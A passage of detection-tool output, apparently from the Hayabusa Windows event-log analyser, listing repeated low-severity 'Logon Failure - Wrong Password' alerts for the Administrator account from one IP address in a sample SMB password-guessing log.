NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: 